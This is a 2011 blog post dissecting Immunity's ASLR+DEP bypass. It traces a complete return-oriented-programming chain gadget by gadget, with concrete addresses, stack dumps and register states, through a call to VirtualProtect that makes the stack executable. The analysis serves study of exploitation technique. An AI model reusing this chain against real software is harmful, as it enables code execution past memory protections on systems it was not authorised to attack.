Sayonara ASLR+DEP bypass dissection

05-Jul-2011 00:11

(Long time, no seeā€¦)
Recently, there was a bit loud about Immunity's ASLR+DEP bypass. Just out of curiosity I've made step-by-step (well, gadget-by-gadget) dissection. It's pretty neat.

Initial stack and registers content

0x010000 7c344cc1 7c3410c2 7c342462 7c38c510
0x010010 7c365645 7c345243 7c348f46 7c3487ec
0x010020 7c344cc1 fffffc14 7c34d749 7c3458aa
0x010030 7c3439fa ffffffc0 7c351eb1 7c354648
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
eax=........ ecx=........ edx=........ ebx=........
esp=00010000 ebp=........ esi=........ edi=........
eip=xxxxxxxx

Following fragments contains gadgets and content of a stack and value of registers AFTER executing the gadget. (I've splitted gadget no 14 into two pieces, just to make it easier to read).

gadget no 1

  • xxxxxxxxxx: ret
  • 0x7c344cc1: pop eax
  • 0x7c344cc2: ret
0x01000c 7c38c510 7c365645 7c345243 7c348f46
0x01001c 7c3487ec 7c344cc1 fffffc14 7c34d749
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
eax=7c3410c2 ecx=........ edx=........ ebx=........
esp=0001000c ebp=........ esi=........ edi=........
eip=7c342462

gadget no 2

  • 7c342462 xor ebx,ebx
  • 7c342464 xor ecx,ecx
  • 7c342466 xor edx,edx
  • 7c342468 xor esi,esi
  • 7c34246a xor edi,edi
  • 7c34246c call eax {7c3410c2}
0x010008 7c34246e 7c38c510 7c365645 7c345243
0x010018 7c348f46 7c3487ec 7c344cc1 fffffc14
0x010028 7c34d749 7c3458aa 7c3439fa ffffffc0
0x010038 7c351eb1 7c354648 7c3530ea 7c344cc1
0x010048 7c37a181 7c355aeb 7c378c81 7c36683f
0x010058 ........ ........ ........ ........
eax=7c3410c2 ecx=00000000 edx=00000000 ebx=00000000
esp=00010008 ebp=........ esi=00000000 edi=00000000
eip=7c3410c2

gadget no 3

  • 7c3410c2 pop ecx
  • 7c3410c3 pop ecx
  • 7c3410c4 ret
0x010014 7c345243 7c348f46 7c3487ec 7c344cc1
0x010024 fffffc14 7c34d749 7c3458aa 7c3439fa
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010014 ebp=........ esi=00000000 edi=00000000
eip=7c365645

gadget no 4

  • 7c365645 5e pop esi
  • 7c365646 c3 ret
0x01001c 7c3487ec 7c344cc1 fffffc14 7c34d749
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=0001001c ebp=........ esi=7c345243 edi=00000000
eip=7c348f46

gadget no 5

  • 7c348f46 pop ebp
  • 7c348f47 ret
0x010024 fffffc14 7c34d749 7c3458aa 7c3439fa
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
eax=7c3410c2 ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010024 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c344cc1

gadget no 6

  • 7c344cc1 pop eax
  • 7c344cc2 ret
0x01002c 7c3458aa 7c3439fa ffffffc0 7c351eb1
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
eax=fffffc14 ecx=7c38c510 edx=00000000 ebx=00000000
esp=0001002c ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c34d749

gadget no 7

  • 7c34d749 neg eax
  • 7c34d74b ret
0x010030 7c3439fa ffffffc0 7c351eb1 7c354648
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
eax=000003ec ecx=7c38c510 edx=00000000 ebx=00000000
esp=00010030 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c3458aa

gadget no 8

  • 7c3458aa add ebx,eax
  • 7c3458ac mov eax,dword ptr [esp+8] ; { [010038] = 7c351eb1 }
  • 7c3458b0 ret
0x010034 ffffffc0 7c351eb1 7c354648 7c3530ea
0x010044 7c344cc1 7c37a181 7c355aeb 7c378c81
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000000 ebx=000003ec
esp=00010034 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c3439fa

gadget no 9

  • 7c3439fa pop edx
  • 7c3439fb ret
0x01003c 7c354648 7c3530ea 7c344cc1 7c37a181
0x01004c 7c355aeb 7c378c81 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
0x01008c ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=ffffffc0 ebx=000003ec
esp=0001003c ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c351eb1

gadget no 10

  • 7c351eb1 neg edx
  • 7c351eb3 ret
0x010040 7c3530ea 7c344cc1 7c37a181 7c355aeb
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010040 ebp=7c3487ec esi=7c345243 edi=00000000
eip=7c354648

gadget no 11

  • 7c354648 pop edi
  • 7c354649 ret
0x010048 7c37a181 7c355aeb 7c378c81 7c36683f
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
0x010098 ........ ........ ........ ........
eax=7c351eb1 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010048 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c344cc1

gadget no 12

  • 7c344cc1 pop eax
  • 7c344cc2 ret
0x010050 7c378c81 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
0x0100a0 ........ ........ ........ ........
eax=7c37a181 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010050 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c355aeb

gadget no 13

  • 7c355aeb sub eax,30h
  • 7c355aee ret
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
0x010094 ........ ........ ........ ........
0x0100a4 ........ ........ ........ ........
eax=7c37a151 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010054 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c378c81

gadget no 14 a.

  • 7c378c81 pushad
  • 7c378c82 add al,0EFh
0x010034 7c3530ea 7c345243 7c3487ec 00010054
0x010044 000003ec 00000040 7c38c510 7c37a151
0x010054 7c36683f ........ ........ ........
0x010064 ........ ........ ........ ........
0x010074 ........ ........ ........ ........
0x010084 ........ ........ ........ ........
eax=7c37a140 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010034 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c378c84

gadget no 14 b.

  • 7c378c84 ret
0x010038 7c345243 7c3487ec 00010054 000003ec
0x010048 00000040 7c38c510 7c37a151 7c36683f
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
eax=7c37a140 ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010038 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c3530ea

gadget no 15

  • 7c3530ea mov eax,dword ptr [eax] ; { [7c37a140] = 74c2435f (VirtualProtect) }
  • 7c3530ec ret
0x01003c 7c3487ec 00010054 000003ec 00000040
0x01004c 7c38c510 7c37a151 7c36683f ........
0x01005c ........ ........ ........ ........
0x01006c ........ ........ ........ ........
0x01007c ........ ........ ........ ........
0x01008c ........ ........ ........ ........
eax=74c2435f ecx=7c38c510 edx=00000040 ebx=000003ec
esp=0001003c ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c345243

gadget no 16

  • 7c345243 ret
0x010040 00010054 000003ec 00000040 7c38c510
0x010050 7c37a151 7c36683f ........ ........
0x010060 ........ ........ ........ ........
0x010070 ........ ........ ........ ........
0x010080 ........ ........ ........ ........
0x010090 ........ ........ ........ ........
eax=74c2435f ecx=7c38c510 edx=00000040 ebx=000003ec
esp=00010040 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c3487ec

gadget no 17

  • 7c3487ec call eax {VirtualProtect (74c2435f)}
  • 7c3487ee test eax,eax
  • 7c3487f0 pop ecx
  • 7c3487f1 je 7c3487f7
  • 7c3487f3 xor eax,eax
  • 7c3487f5 inc eax
  • 7c3487f6 ret
  • 7c3487f7 xor eax,eax
  • 7c3487f9 ret
0x010058 ........ ........ ........ ........
0x010068 ........ ........ ........ ........
0x010078 ........ ........ ........ ........
0x010088 ........ ........ ........ ........
0x010098 ........ ........ ........ ........
eax=__result ecx=7c37a151 edx=zzzzzzzz ebx=000003ec
esp=00010058 ebp=7c3487ec esi=7c345243 edi=7c3530ea
eip=7c36683f

gadget no 18 (pass control back to stack)

  • 7c36683f push esp
  • 7c366840 and al,8
  • 7c366842 ret